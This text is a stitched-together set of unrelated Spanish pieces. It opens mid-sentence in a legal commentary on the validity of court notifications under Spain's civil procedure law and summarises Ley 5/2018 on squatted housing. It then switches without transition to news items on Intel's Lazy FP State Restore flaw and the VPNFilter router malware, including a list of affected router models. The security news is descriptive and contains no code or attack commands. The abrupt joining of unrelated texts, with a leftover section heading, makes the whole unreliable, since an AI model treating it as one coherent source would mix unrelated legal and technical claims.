conducta solo a él imputable determinante de la indefensión que dice haber sufrido y que no consta, razones que llevan a desestimar la nulidad instada.

En Igual sentido se pronuncia la Sección Sexta de la AP de Málaga, Sentencia de 4 / 6 / 2014, respecto a la negativa de ser emplazada la sociedad demandada porque la empleada se negó a hacerse cargo de la notificación, todo ello, incluso ante la negativa a identificarse por parte de la empleada.

Así, la SAP Lugo de 14 / 12 / 2009, prescindiendo de uno de los requisitos exigidos por dicho precepto, es decir, que la comunicación se practique en el domicilio del demandado (en el supuesto se produjo en la persona del marido en la oficina judicial), dicha resolución admitió la notificación en un lugar distinto del domicilio o del lugar de trabajo no ocasional al cumplirse el resto de los requisitos exigidos el precepto (identificación de la persona con la que se entiende informándole de las obligaciones que tiene), incluso existen resoluciones que han admitido la validez de dicha comunicación cuando se ha practicado con un menor de catorce años (SAP de Madrid, de 17 / 9 / 2009, Sección Décima).

La SAP de las Palmas de Gran Canaria de 3 / 5 / 2013, hace referencia a un supuesto en el que el Secretario solicita la práctica de la citación al Servicio de Notificaciones en un determinado domicilio (en el que anteriormente se había intentado notificar a los demandados) y preveía, que para el caso de resultar negativa la citación en ese primer domicilio, un segundo domicilio, así el Servicio de Notificaciones no hace constar en la diligencia que la citación en el primero de los domicilios hubiese resultado negativa, por lo que el Tribunal entendió que se practicó en el primero de domicilios, y al encontrar allí al suegro y padre de los codemandados, quien se negó a recoger la documentación, le hace saber el contenido del artículo 161 de la Ley de Enjuiciamiento Civil. Ante dicha situación, para el Tribunal la citación fue válidamente realizada y no se produjo indefensión alguna, al haber adoptado el demandado una actitud pasiva, al no haber negado que el suegro no les hubiere transmitido el intento de la citación y advertencia del funcionario, por lo que se trataba de una mera indefensión formal.

Lo que tienen en común todas las resoluciones antedichas es salvaguardar el derecho de defensa de las partes, al destacar la enorme importancia que tienen los actos de comunicación, así las última de las resoluciones citadas, al hablar de la indefensión reitera que ésta debe ser material y no meramente formal (STC 26 / 5 / 2008), que establece que es doctrina reiterada de este Tribunal que los actos de comunicación procesal tienen la finalidad material de llevar a conocimiento los afectados las resoluciones judiciales, con objeto de que aquellos puedan adoptar todas las cautelas y garantías que resulten razonablemente adecuadas para asegurar que esa finalidad no se frustre por causas ajenas a la voluntad de los sujetos a quienes afecte (SSTCC 121/1995, de 18 de junio y 64/1996, de 16 de abril); sin que ello signifique exigir al Juez o Tribunal correspondiente el despliegue de una desmedida labor investigadora que pudiera conducir a la indebida restricción de los derechos de defensa de los restantes personados en el proceso (STC 268/2000, de 13 de noviembre). Sin embargo en la doctrina de éste Tribunal se ha precisado igualmente, por una parte, que la única indefensión que tiene relevancia constitucional es la material, y no la mera indefensión formal, de suerte que es exigible la existencia de una perjuicio efectivo en las posibilidades de defensa del recurrente de amparo (SSTC 101/1990, de 4 de junio y 126/1996, de 9 de junio).

Conforme a lo expresado, teniendo en cuenta las anteriores resoluciones, y la actual redacción del párrafo tercero del art 161.3 de la Ley de Enjuiciamiento Civil, que establece también que las comunicaciones así practicadas producen todos sus efectos; entiendo que no existe obstáculo alguno para considerar válidamente practicadas aquellas comunicaciones, en las que ese tercero se niegue a recibirla o firmar la diligencia, lo contrario supondría una exigencia que dificultaría notablemente al desarrollo del proceso, afectando a los derechos de las demás partes intervinientes, siempre que no se limite, restrinja o impida de forma real y efectiva la defensa del destinatario de la comunicación.

Aspectos básicos de la Ley 5/2018 de modificación de la Ley 1/2000 de Enjuiciamiento Civil, en relación a la ocupación ilegal de viviendas

Entrada en vigor

El 2 de julio de 2018, a los veinte días de su publicación en el «Boletín Oficial del Estado».

Finalidad de la norma

La norma pretende crear un nuevo cauce procesal, una variante del juicio verbal posesorio previsto en el artículo 250.1.4º LEC (el antiguo interdicto de recobrar la posesión que tiene por objeto la tutela sumaria de la tenencia o de la posesión de una cosa o derecho por quien haya sido despojado de ellas) para dar una respuesta ágil y efectiva al problema derivado de la ocupación ilegal de viviendas y el consiguiente desalojo del ocupante por la fuerza.

Contenido más relevante

• La reforma modifica el juicio verbal posesorio previsto en el artículo 250.1.4º LEC articulando un procedimiento ad hoc destinado a recuperar de forma inmediata la posesión de un bien inmueble destinado a vivienda que ha sido ocupado ilegalmente (ocupación ni consentida ni tolerada) y restituirla a su legítimo poseedor, pero con un ámbito de aplicación limitado:

-Subjetivamente, a la persona física que sea propietaria o poseedora legítima por otro título, las entidades sin ánimo de lucro con derecho a poseerla y las entidades públicas propietarias o poseedoras legítimas de vivienda social. Quedan fuera los supuestos en que el poseedor despojado sea una persona jurídica en la que no concurra la nota de ausencia de lucro.

-Objetivamente, a inmuebles que tengan la consideración de vivienda, sin distinción de que se trate de vivienda habitual o de segunda vivienda, pero excluyendo a locales de negocio.

• El proceso sigue la tramitación del juicio verbal, con las siguientes especialidades:

-Con la demanda se deberá acompañar el título en el que el actor funde su derecho a poseer.

La demanda aun cuando se desconozca quien sea el autor del despojo podrá dirigirse genéricamente contra los desconocidos ocupantes de la vivienda, sin perjuicio de la notificación que de ella se realice a quien en concreto se encontrare en el inmueble al tiempo de llevar a cabo dicha notificación y quien realice el actor de comunicación podrá ir acompañado de los agentes de la autoridad.

El demandante puede solicitar con la demanda la inmediata entrega de la posesión de la vivienda, abriéndose un trámite incidental. En el decreto de admisión se requerirá a los ocupantes para que aporten en el plazo de cinco días título que justifique su situación posesoria. Si no se aporta justificante suficiente el tribunal ordenará mediante auto la inmediata entrega de la posesión de la vivienda al demandante, siempre que el título que se hubiere acompañado a la demanda fuere bastante para la acreditación de su derecho a poseer y sin que contra el auto que decida sobre el incidente quepa recurso alguno, llevándose a efecto contra cualquiera de los ocupantes que se encontraren en ese momento en la vivienda.

-En la misma resolución en que se acuerde la entrega de la posesión de la vivienda al demandante y el desalojo de los ocupantes, se ordenará comunicar tal circunstancia, siempre que se hubiera otorgado el consentimiento por los interesados, a los servicios públicos competentes en materia de política social, para que, en el plazo de siete días, puedan adoptar las medidas de protección que en su caso procedan.

Si el demandado o demandados no contestaran a la demanda en el plazo legalmente previsto, se procederá de inmediato a dictar sentencia. La oposición del demandado podrá fundarse exclusivamente en la existencia de título suficiente frente al actor para poseer la vivienda o en la falta de título por parte del actor. La sentencia estimatoria de la pretensión permitirá su ejecución, previa solicitud del demandante, sin necesidad de que transcurra el plazo de veinte días previsto en el artículo 548 LEC.

Disposiciones afectadas

Modifica:

• artículos 150 , 437 , 441 y 444 de la Ley 1/2000, de 7 de enero, de Enjuiciamiento Civil .

• La disposición final décima de la Ley 20/2011, de 21 de julio , del Registro Civil, para amplíar la vacatio de la Ley 20/2011, de 21 de julio , del Registro Civil, hasta el 30 de junio de 2020.

Contenido más relevante

Todos los procesadores Intel en peligro, otra vez; ahora por el fallo Lazy FP State Restore

Desde luego no está siendo un año precisamente bueno para Intel. La primera semana de enero de 2018 se dieron a conocer dos vulnerabilidades, llamadas Meltdown y Spectre, que han puesto en jaque la seguridad de absolutamente todos los procesadores modernos existentes. La complejidad de estos fallos de seguridad ha hecho no solo que sean muy complicados de solucionar y su parche implique una pérdida de rendimiento en los procesadores, sino que cada poco aparezcan nuevos fallos relacionados con ellas, como distintas variantes de Spectre o un nuevo fallo que ha afectado, de nuevo, a toda la gama de procesadores Intel: Lazy FP State Restore.

Hace algunas horas, Intel informaba de este nuevo fallo de seguridad relacionado con la ejecución especulativa relacionado con Lazy FP State Restore. Este fallo de seguridad, de forma similar a como ocurre con las demás vulnerabilidades relacionadas con Meltdown y Spectre, puede permitir a cualquier programa tener acceso a los datos de cualquier otro proceso y capturarlos.

Según la confirmado Intel, esta nueva vulnerabilidad afecta a todos los procesadores Intel-Core del fabricante, y se trata de un fallo presente en el mismo procesador, por lo que afecta por igual a todos los sistemas operativos, como Windows, Linux, BSD, etc, que utilicen la función Lazy FPU context switching, una función de optimización utilizada por prácticamente todos los sistemas operativos modernos. Mientras que acceder a cierta información no debería tener demasiada relevancia, estas funciones son utilizadas también por los algoritmos de cifrado, por lo que, a través de esta vulnerabilidad, un proceso cualquiera podría incluso recuperar una clave de cifrado privada, poniendo en peligro toda la criptografía del equipo.

Cómo de peligrosa es la vulnerabilidad Lazy FP de Intel y cómo podemos protegernos en Windows

Esta nueva vulnerabilidad ya ha sido registrada como CVE-2018-3665, y los principales desarrolladores de sistemas operativos ya han publicado sus correspondientes notas informativas sobre ella. En el caso de Microsoft, por ejemplo, podemos ver cómo la compañía nos avisa de que Lazy Restore es una función que viene habilitada por defecto en todos los sistemas Windows y, además, que no puede ser deshabilitada. Eso sí, las instancias en la nube basadas en Azure no son vulnerables, solo afecta a los sistemas de escritorio y servidores basados en procesadores Intel-Core.

Microsoft ya está trabajando en una actualización de seguridad que nos permita protegernos de esta vulnerabilidad, aunque, de momento, no se sabe nada sobre él, ni cuándo llegará (probablemente el próximo martes de parches) ni la repercusión que tendrá.

Eso sí, debemos tener en cuenta que, al menos, esta vulnerabilidad no se puede explotar de forma remota a través del navegador, sino que para hacerla efectiva se tiene que ejecutar en un proceso propio del sistema, por ejemplo, a través de malware. Además, igual que todas las demás vulnerabilidades relacionadas con Meltdown y Spectre, no es precisamente sencilla de explotar, por lo que tampoco tenemos que preocuparnos en exceso, simplemente estar atentos a las actualizaciones de seguridad para protegernos cuanto antes.

VPNFilter es peor de lo que se creía: puede saltarse HTTPS, y hay 60 routers afectados más

VPNFilter también puede saltarse HTTPS

Los hackers, que según el FBI trabajan para Rusia, habían infectado 500.000 routers en todo el mundo antes de que el FBI tomara el control del servidor que controlaba la red de dispositivos infectados, la cual podía usarse para crear un ataque DDoS masivo. La subdivisión Talos, de Cisco, dice que el malware puede realizar ataques de man-in-the-middle en trafico web entrante. Así, puedeninyectar contenido malicioso junto con el tráfico que pasa por el router infectado, modificando el contenido de las webs que vemos.

router

Este módulo de inyección, llamado “ssler”, está diseñado también para extraer información sensible entre los dispositivos conectados al router y la red. Para ello, analiza las URL de las páginas para detectar señales que indiquen que se está transmitiendo una contraseña o cualquier otra información sensible, y las envía a servidores que el atacante todavía tiene bajo su control a pesar de que hayan pasado dos semanas desde que fue publicada la existencia de este malware.

Sin embargo, lo más peligroso que hace el malware es saltarse el cifrado TLS,degradando las conexiones HTTPS a HTTP para poder leerlas en texto plano. Así, cambian las cabeceras para hacer creer que el dispositivo final no soporta conexiones cifradas. Además, tiene un comportamiento determinado con tráfico que va hacia Google, Facebook, Twitter o YouTube, probablemente debido a que usan funcionalidades de seguridad adicionales. Google, por ejemplo, lleva años redirigiendo el tráfico HTTP a sus servidores HTTPS.

Con esto, los atacantes pueden hacer cosas como modificar el número que ves en el balance de tu cuenta corriente y que todo se vea correcto, pero en realidad estén vaciando tu cuenta. Tienen control total sobre tu ordenador.

Inicialmente se creía que VPNFilter lo que buscaba era crear una botnet con los dispositivos infectados para lanzar ataques DDoS. Sin embargo, además de poder hacer esto, los propios usuarios de los routers infectados también son objetivos de este ataque. Además, se ha descubierto que hay más modelos afectados por este ataque, con marcas como ASUS, D-Link, Huawei y ZTE. Se estima que esto añade 200.000 usuarios afectados por la vulnerabilidad. El listado completo es el siguiente:

  • ASUS: RT-AC66U, RT-N10, RT-N10E, RT-N10U, RT-N56U, RT-N66U
  • D-Link: DES-1210-08P, DIR-300, DIR-300A, DSR-250N, DSR-500N, DSR-1000, DSR-1000N
  • Huawei: HG8245
  • Linksys: E1200, E2500, E3000, E3200, E4200, RV082, WRVS4400N
  • Mikrotik: CCR1009, CCR1016,CCR1036, CCR1072, CRS109, CRS112, CRS125, RB411, RB450, RB750, RB911, RB921, RB941, RB951, RB952, RB960, RB962, RB1100, RB1200, RB2011, RB3011, RB Groove, RB Omnitik, STX5,
  • Netgear: DG834, DGN1000, DGN2200, DGN3500, FVS318N, MBRN3000, R6400, R7000, R8000, WNR1000, WNR2000, WNR2200, WNR4000, WNDR3700, WNDR4000, WNDR4300, WNDR4300-TN, UTM50
  • QNAP: TS251, TS439 Pro, otros NAS de QNaP que usen software QTS
  • TP-Link: R600VPN, TL-WR741ND, TL-WR841N
  • Ubiquiti: NSM2, PBE M5
  • Upvel: modelos desconocidos
  • ZTE: ZXHN H108N